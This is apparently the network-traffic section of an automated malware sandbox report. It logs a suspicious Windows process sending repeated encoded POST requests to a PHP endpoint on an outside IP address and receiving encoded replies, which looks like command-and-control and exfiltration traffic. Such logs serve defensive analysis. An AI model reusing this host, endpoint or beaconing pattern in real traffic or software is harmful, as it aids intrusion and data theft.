                                                                                                                                                                        Jan 3, 2025 07:59:06.423019886 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:06.423090935 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:06.423194885 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:06.766067028 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:06.808659077 CET5010180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:06.895543098 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:06.949430943 CET5010180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.038757086 CET5010180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.039469957 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.043797970 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.043910980 CET5010180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.044358015 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.044473886 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.044748068 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.049500942 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.402508974 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.408560038 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.408579111 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.408591986 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.733371019 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.777348995 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.862514019 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.918004036 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.015171051 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.015547037 CET5010380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.020304918 CET805010386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.020390034 CET5010380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.020550966 CET5010380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.021209955 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.021265030 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.025263071 CET805010386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.371340990 CET5010380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.376298904 CET805010386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.376317978 CET805010386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.376332045 CET805010386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.707544088 CET805010386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.761735916 CET5010380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.835349083 CET805010386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.886715889 CET5010380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.918436050 CET5010380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.918844938 CET5010480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.923463106 CET805010386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.923517942 CET5010380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.923784971 CET805010486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.923856020 CET5010480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.923975945 CET5010480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.928682089 CET805010486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.959939003 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.963076115 CET5010480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.963318110 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.968149900 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.969793081 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.969907045 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.974637985 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:09.011919022 CET805010486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:09.324436903 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:09.329293966 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:09.329322100 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:09.329333067 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:09.396497965 CET805010486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:09.396580935 CET5010480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:09.654917955 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:09.699234009 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:09.791429043 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:09.839912891 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:09.924743891 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:09.925406933 CET5010680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:09.930016041 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:09.930078983 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:09.930175066 CET805010686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:09.930262089 CET5010680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:09.930385113 CET5010680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:09.935158014 CET805010686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:10.632061005 CET805010686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:10.683592081 CET5010680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:20.645888090 CET805010686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:20.645911932 CET805010686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:20.645977974 CET5010680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:29.904002905 CET5010680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:29.905509949 CET5010680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:29.909071922 CET805010686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:29.909085035 CET805010686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:30.147995949 CET805010686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:30.148010015 CET805010686.110.194.28192.168.2.4

                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                        • 86.110.194.28

                                                                                                                                                                        HTTP Packets

                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.44973686.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:57:40.658014059 CET327OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 344
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:57:41.012522936 CET344OUTData Raw: 05 06 01 06 03 0f 01 07 05 06 02 01 02 07 01 0a 00 05 05 00 02 0d 03 01 01 00 0f 57 05 04 02 03 0a 03 06 0a 03 07 05 00 0f 02 05 56 00 01 05 00 06 01 0b 00 0d 00 01 00 01 02 03 04 05 07 05 08 03 02 0e 0a 06 56 06 52 0e 07 0c 50 0e 00 0b 02 07 56
                                                                                                                                                                        Data Ascii: WVVRPVU\RRV\L~@|~vrbYwfp|o}tRU\|s|ylpZzp_Z|}sPtwR}e~V@Azmnb[
                                                                                                                                                                        Jan 3, 2025 07:57:41.357531071 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:41.455720901 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:41 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 1400
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 56 4a 7e 43 7b 43 63 01 7b 04 78 02 7f 62 6b 07 7d 59 7c 53 68 4e 7d 41 6d 5d 52 4f 7e 5c 74 48 77 4d 71 0d 79 62 79 01 62 66 52 06 7e 5b 78 01 55 4b 72 50 74 5c 67 07 68 61 6a 5f 6b 64 76 0a 78 66 70 0c 69 60 77 49 61 62 75 06 60 07 62 5d 7f 61 75 58 69 0a 67 51 7e 49 5e 5a 76 66 7b 06 7c 5c 6a 5a 7d 63 6a 58 79 77 70 00 6f 49 6c 05 6f 0b 7b 49 79 5b 63 5a 7b 5a 6e 04 7d 73 7f 5b 79 77 6c 07 69 5c 5d 04 76 5f 73 5c 7a 51 41 5b 68 59 67 52 7f 5f 7e 50 75 6c 52 03 6c 6c 74 00 60 5e 66 09 7a 71 5f 05 7d 6c 50 4e 7a 72 79 58 61 05 70 5a 76 5f 74 4f 74 71 7a 50 7e 5d 79 5f 77 62 6d 00 61 66 73 50 7f 6c 65 05 77 6f 77 5d 7f 60 7c 06 78 6c 67 03 6c 4e 66 06 7c 6d 7b 51 77 01 7c 03 69 62 62 09 6a 6e 73 42 7a 7d 7a 06 69 5c 7d 4f 7b 5d 46 51 7f 6c 60 43 6a 63 64 40 7e 49 72 05 7a 6e 7c 5f 79 72 74 03 68 07 6b 00 7e 67 63 0b 7c 59 69 09 7a 4d 68 05 6a 5b 7c 48 76 63 57 51 7b 5c 79 02 75 66 68 03 7d 58 68 4f 7e 58 7d 09 76 62 59 00 7f 5c 79 01 7d 67 76 43 78 66 78 4f 7e 4d 59 04 75 62 75 04 76 71 53 00 7c 4f [TRUNCATED]
                                                                                                                                                                        Data Ascii: VJ~C{Cc{xbk}Y|ShN}Am]RO~\tHwMqybybfR~[xUKrPt\ghaj_kdvxfpi`wIabu`b]auXigQ~I^Zvf{|\jZ}cjXywpoIlo{Iy[cZ{Zn}s[ywli\]v_s\zQA[hYgR_~PulRllt`^fzq_}lPNzryXapZv_tOtqzP~]y_wbmafsPlewow]`|xlglNf|m{Qw|ibbjnsBz}zi\}O{]FQl`Cjcd@~Irzn|_yrthk~gc|YizMhj[|HvcWQ{\yufh}XhO~X}vbY\y}gvCxfxO~MYubuvqS|OXH~BR@}YUJv_U{buH~pixI^LygtxmgzrVIxsT|p|{wpD}\g@u_VH}RgK|IhA|a_vBh{ltwN~zO}||j{_rHvMuOdNtqPC|Nft\mLu[pRit|xO|MhxB{J{prDCR@vg`A}bP~CszmTL~reM`t||^pt}Yrz}gD{bpHOgI}Yg`}{c`~b^wMeyaSIwvtK~HR@fawLgK}r}O|Ib{vR}]{wrqvqiOr}|t~wu_sxb_J}`SxYx{Ypy}YxrpxMzA{]NZoYcZj[oNvxI}|xZdxXmbU|o|]Z`aUyXmiUb_z\y\}b`g{ZL~JxYyZwb[MaeQQhoiBw|lh]cY{lgKxpjIh}|Ntdc]}LySzSYQa~infSqUPPoowTcIRdeXoTtT~cthm`[QtZUkcHNmFS~cX[p\RebFq[F[iv`~v}vahYkbaLdaTx_h|p`]a\qwXjZaTHilP]AZbdFVq@iTFnsXUkoYUcXx_|y]f~^|J{JK|r]^tv^ioEP{gVSb_aUPkxp_UPLvjQyD|\DXb`E[rMc[Liy[cTCZXpxSY]A{oSsAQA[oeEQ~AcUCh}TiZNWRy
                                                                                                                                                                        Jan 3, 2025 07:57:41.455737114 CET393INData Raw: 40 6a 71 65 5e 7d 5d 7b 77 65 6b 70 4a 79 59 55 54 51 00 75 47 51 6e 56 43 54 5a 08 48 6b 62 56 43 51 01 03 77 68 63 01 54 7d 5d 56 5c 64 5b 63 02 70 71 5c 4e 57 58 43 5a 74 71 7b 5c 69 65 08 40 52 7a 6e 56 58 61 07 55 6b 04 09 04 50 5d 61 40 53
                                                                                                                                                                        Data Ascii: @jqe^}]{wekpJyYUTQuGQnVCTZHkbVCQwhcT}]V\d[cpq\NWXCZtq{\ie@RznVXaUkP]a@SgwNipgYw_r`lLqCxXW]RwJTdVCZYZWnEW|rb^@l`pUdDVng]otubVslkxZu|YbbGQp`\Sd^kL\UCoohRnf}zSt|\DXb`E[rMc[Li}A[XjEZ\oMU}][ol\~^s|T|TwqqPno@Xd
                                                                                                                                                                        Jan 3, 2025 07:57:41.563128948 CET303OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 384
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:57:41.781757116 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:41.781928062 CET384OUTData Raw: 5e 55 5e 5e 58 57 55 5c 54 5b 59 5a 5b 5e 57 52 5f 5c 5a 5a 52 56 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^U^^XWU\T[YZ[^WR_\ZZRVPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&(!98U&,;(+_3)]2,=V!')U!(?'D0<,)9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:57:42.006361008 CET324INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:41 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 13 32 38 35 05 2a 59 3f 5f 26 0d 25 5e 21 1e 38 1a 2c 20 0b 1c 35 05 39 12 32 38 38 55 3f 3d 0f 18 3c 0d 21 12 34 3e 32 0a 3f 1a 28 5d 03 10 39 13 3f 5b 37 11 3e 10 29 16 3a 51 20 03 24 19 24 5b 2a 30 26 08 32 02 03 0c 21 04 27 1e 29 23 25 5f 27 02 24 14 3f 33 3f 10 24 3d 20 54 0b 17 27 57 27 23 30 02 25 16 00 05 3e 0e 34 58 27 14 2d 50 36 3f 3e 51 22 2a 28 5e 38 33 26 0c 33 01 29 54 29 3d 2b 55 26 2a 22 5c 24 11 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $285*Y?_&%^!8, 59288U?=<!4>2?(]9?[7>):Q $$[*0&2!')#%_'$?3?$= T'W'#0%>4X'-P6?>Q"*(^83&3)T)=+U&*"\$.\#(U4WP
                                                                                                                                                                        Jan 3, 2025 07:57:42.006664991 CET303OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 384
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:57:42.225194931 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:42.225382090 CET384OUTData Raw: 5e 57 5b 5f 58 5e 55 5a 54 5b 59 5a 5b 56 57 52 5f 54 5a 5f 52 51 50 42 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^W[_X^UZT[YZ[VWR_TZ_RQPBZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C<>&#*,W%?>;X$7)15R5'=V7^+$),&<?+)#Y'$X.%
                                                                                                                                                                        Jan 3, 2025 07:57:42.450411081 CET324INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:42 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 27 02 32 15 2d 02 3e 06 23 5b 25 33 31 13 21 33 33 04 38 1e 2e 43 35 3c 3d 12 26 05 23 0f 3f 03 04 44 3c 23 31 51 34 00 0c 0a 2b 0a 28 5d 03 10 39 1e 3f 2d 01 59 3e 58 32 04 3a 0e 33 19 33 09 38 5b 2a 1d 32 0f 27 3f 3a 52 20 3d 28 0a 2a 23 0c 03 27 15 2b 02 3c 1e 28 00 24 17 20 54 0b 17 27 54 24 30 38 07 26 38 3a 04 3d 34 23 03 24 14 2d 53 22 05 32 1a 20 07 09 04 38 20 36 0d 25 2b 25 53 2b 3d 23 55 32 5c 36 5d 27 2b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: '2->#[%31!338.C5<=&#?D<#1Q4+(]9?-Y>X2:338[*2'?:R =(*#'+<($ T'T$08&8:=4#$-S"2 8 6%+%S+=#U2\6]'+.\#(U4WP
                                                                                                                                                                        Jan 3, 2025 07:57:42.451253891 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 1384
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:57:42.671153069 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:42.671318054 CET1384OUTData Raw: 5b 51 5e 59 58 5a 55 5d 54 5b 59 5a 5b 57 57 5d 5f 53 5a 5a 52 51 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q^YXZU]T[YZ[WW]_SZZRQPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&(%":0U2<$C);3!X2,6"'!Q ($Y'_7'(#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:57:43.061712027 CET324INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:42 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 11 31 28 32 11 2a 2f 23 59 25 1d 29 11 21 1e 24 5c 2f 09 2d 18 35 12 2d 12 31 05 3f 0e 3d 3e 36 09 28 1d 31 12 34 3e 2a 0a 28 1a 28 5d 03 10 3a 04 2b 3d 0d 12 29 00 03 5e 2d 09 0d 5e 25 37 0e 58 2b 20 3d 1c 25 02 35 0a 20 2d 0e 0f 2a 33 0c 02 33 3b 28 5a 3f 33 20 00 33 3d 20 54 0b 17 27 1d 27 1e 01 5a 25 3b 25 58 2a 0e 28 58 27 29 3e 0a 22 2f 2e 1b 37 39 2c 18 2f 33 29 57 27 06 07 52 3d 58 2b 56 32 39 2a 58 24 11 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $1(2*/#Y%)!$\/-5-1?=>6(14>*((]:+=)^-^%7X+ =%5 -*33;(Z?3 3= T''Z%;%X*(X')>"/.79,/3)W'R=X+V29*X$.\#(U4WP


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.44973786.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:57:41.648694038 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:57:41.996231079 CET2516OUTData Raw: 5b 50 5e 58 58 5e 55 5d 54 5b 59 5a 5b 55 57 53 5f 55 5a 5c 52 55 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [P^XX^U]T[YZ[UWS_UZ\RUPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&B<>)_"8T$/ @);^3B>%!"4!4; '80?$U()#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:57:42.372219086 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:42.505937099 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:42 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.44973886.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:57:42.728418112 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:57:43.074203968 CET2516OUTData Raw: 5e 52 5e 5c 5d 5e 55 5f 54 5b 59 5a 5b 51 57 5c 5f 5c 5a 5e 52 51 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^R^\]^U_T[YZ[QW\_\Z^RQPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%?X6!\;&,>='$5]'/66$:4;0X39,B$?(W+)#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:57:43.425899029 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:57:43.557955027 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:43 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.44973986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:57:44.251765013 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:57:44.610259056 CET2516OUTData Raw: 5b 52 5e 58 58 5d 55 5d 54 5b 59 5a 5b 55 57 53 5f 51 5a 58 52 51 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
